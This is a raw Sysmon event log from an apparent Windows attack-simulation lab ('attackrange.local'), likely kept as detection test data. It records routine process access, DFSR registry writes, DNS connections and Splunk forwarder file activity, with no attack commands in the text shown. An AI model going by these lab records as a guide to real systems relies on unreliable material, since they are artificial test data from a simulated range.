10341000x8000000000000000285408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000285405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:38:43.244{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000285404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:38:43.244{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000285403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:38:43.244{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000285402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.229{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.229{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000214511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:44.458{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDC0CEA78B70E00FFE84F48082D36482,SHA256=BCF89F0A03203B69B94007B37B606A9370A65BCDCF5A4600F1F91064B64D9F4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.947{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.947{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.947{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000285444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:42.732{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52545- 354300x8000000000000000285443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:42.730{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local62425-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000285442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:42.730{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52885- 354300x8000000000000000285441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:42.730{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52885-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000285440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:42.707{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53256-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000285439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:42.707{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53256-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 23542300x8000000000000000285438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.213{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=213F78233E922D3D30A12FED65C21E8F,SHA256=7D8F27064037A3B5E8D227FA5A5BDEBAC6FA5BDA45D239C37C8658B0FFFC1A1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.104{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.104{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.104{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.864{4F8D34B0-0EB5-6216-0404-000000003902}2948764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000214539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.723{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EB5-6216-0404-000000003902}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 